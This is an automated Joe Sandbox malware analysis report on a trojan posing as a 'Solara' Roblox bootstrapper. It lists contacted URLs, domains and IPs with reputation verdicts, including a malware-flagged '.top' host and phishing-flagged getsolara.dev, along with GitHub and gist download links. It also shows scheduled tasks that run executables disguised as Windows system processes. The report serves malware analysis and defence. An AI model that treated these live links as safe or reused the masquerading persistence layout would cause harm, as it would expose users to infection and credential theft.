https://getsolara.dev/asset/discord.json	100%	Avira URL Cloud	phishing
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://james.newtonking.com/projects/json	0%	Avira URL Cloud	safe
http://getsolara.dev	100%	Avira URL Cloud	phishing
https://discord.com;http://127.0.0.1:6463/rpc?v=11	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
http://james.newtonking.com/projects/json	0%	Virustotal		Browse
https://getsolara.dev/asset/discord.json	9%	Virustotal		Browse
https://ncs.roblox.com/upload	0%	Virustotal		Browse
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live	0%	Avira URL Cloud	safe
http://crl.m	0%	Avira URL Cloud	safe
http://127.0.0.1:64632b	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse
https://getsolara.dev	100%	Avira URL Cloud	phishing
https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip	0%	Virustotal		Browse
https://getsolara.dev/api/endpoint.json	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/wsdl/	0%	Avira URL Cloud	safe
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live	0%	Virustotal		Browse
http://getsolara.dev	14%	Virustotal		Browse
https://www.newtonsoft.com/jsonschema	0%	Avira URL Cloud	safe
https://getsolara.dev	12%	Virustotal		Browse
http://schemas.xmlsoap.org/wsdl/	0%	Virustotal		Browse
https://github.com/zzzprojects/html-agility-pack/issues/513	0%	Avira URL Cloud	safe
https://getsolara.dev/Suspected	100%	Avira URL Cloud	phishing
https://getsolara.dev/X	100%	Avira URL Cloud	phishing
https://www.newtonsoft.com/jsonschema	0%	Virustotal		Browse
https://www.nuget.org/packages/Newtonsoft.Json.Bson	0%	Avira URL Cloud	safe
https://getsolara.dev/Suspected	11%	Virustotal		Browse
https://pastebin.com/raw/pjseRvyK	0%	Avira URL Cloud	safe
https://getsolara.dev/api/endpoint.json	9%	Virustotal		Browse
http://clientsettings.roblox.com	0%	Avira URL Cloud	safe
https://getsolara.dev/X	11%	Virustotal		Browse
http://pastebin.com	0%	Avira URL Cloud	safe
https://www.nuget.org/packages/Newtonsoft.Json.Bson	0%	Virustotal		Browse
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	0%	Avira URL Cloud	safe
https://pastebin.com	0%	Avira URL Cloud	safe
https://pastebin.com/raw/pjseRvyK	1%	Virustotal		Browse
https://clientsettings.roblox.com	0%	Avira URL Cloud	safe
https://github.com/zzzprojects/html-agility-pack/issues/513	0%	Virustotal		Browse
http://clientsettings.roblox.com	0%	Virustotal		Browse
http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal.php	100%	Avira URL Cloud	malware
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	0%	Virustotal		Browse
http://pastebin.com	0%	Virustotal		Browse
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c	0%	Avira URL Cloud	safe
https://pastebin.com	0%	Virustotal		Browse
https://clientsettings.roblox.com	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
598828cm.n9shka.top	80.211.144.156	true	true		unknown
getsolara.dev	172.67.203.125	true	false	14%, Virustotal, Browse	unknown
edge-term4-fra2.roblox.com	128.116.123.4	true	false	0%, Virustotal, Browse	unknown
www.nodejs.org	104.20.23.46	true	false	0%, Virustotal, Browse	unknown
pastebin.com	104.20.3.235	true	true	0%, Virustotal, Browse	unknown
clientsettings.roblox.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://getsolara.dev/	true	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://getsolara.dev/asset/discord.json	true	9%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pastebin.com/raw/pjseRvyK	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:6463	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.nodejs.org	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	URL Reputation: safe	unknown
https://ncs.roblox.com/upload	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6FB000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE73B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.nodejs.org	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	URL Reputation: safe	unknown
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/vs/17/release/vc_redist.x64.exe	BootstrapperV1.19.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	URL Reputation: safe	unknown
https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw	BootstrapperV1.19.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://127.0.0.1:6463/rpc?v=1	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, PerfNET.exe, 0000000D.00000002.2160196678.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2553387448.000001654C041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166ABF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F1217F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1E741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01411000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://edge-term4-fra2.roblox.com	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://discord.com	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000020.00000002.2553387448.000001654C2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DC27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166AC146000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F121A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1EA3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://james.newtonking.com/projects/json	BootstrapperV1.19.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://getsolara.dev	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE658000.00000004.00000800.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://discord.com;http://127.0.0.1:6463/rpc?v=11	BootstrapperV1.19.exe	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE692000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE679000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	URL Reputation: safe	unknown
http://crl.m	powershell.exe, 0000002F.00000002.2477459718.000002B1AF100000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:64632b	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://getsolara.dev	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE64E000.00000004.00000800.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://getsolara.dev/api/endpoint.json	BootstrapperV1.19.exe	true	9%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000020.00000002.2553387448.000001654C2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DC27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166AC146000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F121A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1EA3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.newtonsoft.com/jsonschema	BootstrapperV1.19.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/zzzprojects/html-agility-pack/issues/513	BootstrapperV1.19.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://getsolara.dev/Suspected	BootstrapperV1.19.exe	true	11%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://getsolara.dev/X	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson	BootstrapperV1.19.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000020.00000002.2553387448.000001654C041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166ABF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF4B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F1217F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1E741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01411000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://clientsettings.roblox.com	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pastebin.com	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	false	URL Reputation: safe	unknown
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6FB000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE737000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pastebin.com	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://clientsettings.roblox.com	BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c	BootstrapperV1.19.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.203.125	getsolara.dev	United States	13335	CLOUDFLARENETUS	false
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	true
128.116.123.4	edge-term4-fra2.roblox.com	United States	22697	ROBLOX-PRODUCTIONUS	false
80.211.144.156	598828cm.n9shka.top	Italy	31034	ARUBA-ASNIT	true
104.20.23.46	www.nodejs.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1511213
Start date and time:	2024-09-14 12:51:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	82
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BootstrapperV1.19.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@86/345@5/6
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 74% Number of executed functions: 320 Number of non-executed functions: 74
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, RuntimeBroker.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target BootstrapperV1.19.exe, PID 7152 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:52:04	API Interceptor	77x Sleep call for process: BootstrapperV1.19.exe modified
06:52:27	API Interceptor	1x Sleep call for process: WerFault.exe modified
06:52:41	API Interceptor	345x Sleep call for process: powershell.exe modified
06:53:04	API Interceptor	257996x Sleep call for process: xMWILCHEwdBVCAxxjofRRL.exe modified
11:52:36	Task Scheduler	Run new task: PerfNET path: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe"
11:52:37	Task Scheduler	Run new task: PerfNETP path: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe"
11:52:38	Task Scheduler	Run new task: RuntimeBroker path: "C:\Users\Default\AppData\RuntimeBroker.exe"
11:52:39	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Users\Default\AppData\RuntimeBroker.exe"
11:52:39	Task Scheduler	Run new task: SIHClient path: "C:\Windows\ELAMBKUP\SIHClient.exe"
11:52:40	Task Scheduler	Run new task: SIHClientS path: "C:\Windows\ELAMBKUP\SIHClient.exe"
11:52:40	Task Scheduler	Run new task: xMWILCHEwdBVCAxxjofRRL path: "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
11:52:40	Task Scheduler	Run new task: xMWILCHEwdBVCAxxjofRRLx path: "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.203.125	RHUENHera1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse
104.20.3.235	SX8OLQP63C.exe	Get hash	malicious	VjW0rm, AsyncRAT, RATDispenser	Browse	pastebin.com/raw/V9y5Q5vv
	sostener.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
